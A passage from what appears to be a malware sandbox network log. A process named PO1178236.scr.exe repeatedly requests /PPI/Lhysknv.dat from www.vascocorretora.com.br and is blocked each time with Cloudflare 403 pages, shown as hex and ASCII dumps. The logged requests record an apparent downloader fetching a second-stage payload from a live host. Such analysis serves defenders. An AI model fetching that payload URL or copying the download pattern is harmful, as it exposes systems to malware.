70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c23bbef341e9</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:51 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 33 62 62 65 66 33 34 31 65 39 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c23bbef341e9',t:'MTczNjQwODIxMS4wMDAwMDA='};v
        2025-01-09 07:36:51 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        90192.168.2.949799188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:52 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:52 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:52 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:07 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uanLU5kd%2FiIeibeLPimrHBaW1To8WNxbWII2perKgFCsm6Uz7vdTgIktMYWLzUy3lqt9zxHB2kcOG8BuWRNVWN1QZiNwavKSvhRieqvv5J7jyPWYwmPd%2Fk%2F35Q34Dfx7NyZHNRUrntSDuOih"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c23f8ac2425f-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2523&min_rtt=2522&rtt_var=949&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1150965&cwnd=220&unsent_bytes=0&cid=5ebccdf95a30e025&ts=135&x=0"
        2025-01-09 07:36:52 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:52 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:52 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:52 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 33 66 38 61 63 32 34 32 35 66 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c23f8ac2425f</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:52 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 33 66 38 61 63 32 34 32 35 66 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c23f8ac2425f',t:'MTczNjQwODIxMi4wMDAwMDA='};var a
        2025-01-09 07:36:52 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        91192.168.2.949800188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:52 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:53 UTC1017INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:53 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:08 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oECcz%2BOA9CwwiSnq31VYHLk2VHN%2FQ89DfvDGoI7PNbHZ%2B%2FQG5EqZDjR%2BZQ%2FDNa2p%2Bv8ZIqq4nnbM8h0%2BTylwgrmKt56tZVjJ%2FXQq0WicdNBnVe2EhpK11mZfJ1AoKt2Nf8f81Iknw0WWEZ2n"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2436f6c5e6c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2101&min_rtt=2094&rtt_var=791&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1394460&cwnd=239&unsent_bytes=0&cid=fa40cd9dd55acb76&ts=149&x=0"
        2025-01-09 07:36:53 UTC352INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:53 UTC1369INData Raw: 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74
        Data Ascii: d! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content
        2025-01-09 07:36:53 UTC1369INData Raw: 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e
        Data Ascii: cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>
        2025-01-09 07:36:53 UTC1369INData Raw: 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 34 33 36 66 36 63 35 65 36 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72
        Data Ascii: er sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2436f6c5e6c</strong></span> <span class="cf-footer-separator
        2025-01-09 07:36:53 UTC1010INData Raw: 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 34 33 36 66 36 63 35 65 36 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4d 79 34 77 4d 44 41 77
        Data Ascii: ript> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2436f6c5e6c',t:'MTczNjQwODIxMy4wMDAw
        2025-01-09 07:36:53 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        92192.168.2.949801188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:53 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:53 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:53 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:08 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RXVLUXo%2BxTlFAYIhejWzxJN43iti%2BI3yZapwGSmAJzeG%2BqCOZCnq7KoIQnfEm5nuFGMuRE%2BMmoB0voiOUpiokGyPDT3ovIkUQACCuZcxViSlRL0dfA5Ia774Qcn9WfEJDw7UevoGRaf2%2F837"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2473c9278db-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1910&min_rtt=1906&rtt_var=724&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1502830&cwnd=237&unsent_bytes=0&cid=c78707f0c96a484d&ts=141&x=0"
        2025-01-09 07:36:53 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:53 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:53 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:53 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 34 37 33 63 39 32 37 38 64 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2473c9278db</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:53 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 34 37 33 63 39 32 37 38 64 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2473c9278db',t:'MTczNjQwODIxMy4wMDAwMDA='};v
        2025-01-09 07:36:53 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        93192.168.2.949802188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:54 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:54 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:54 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
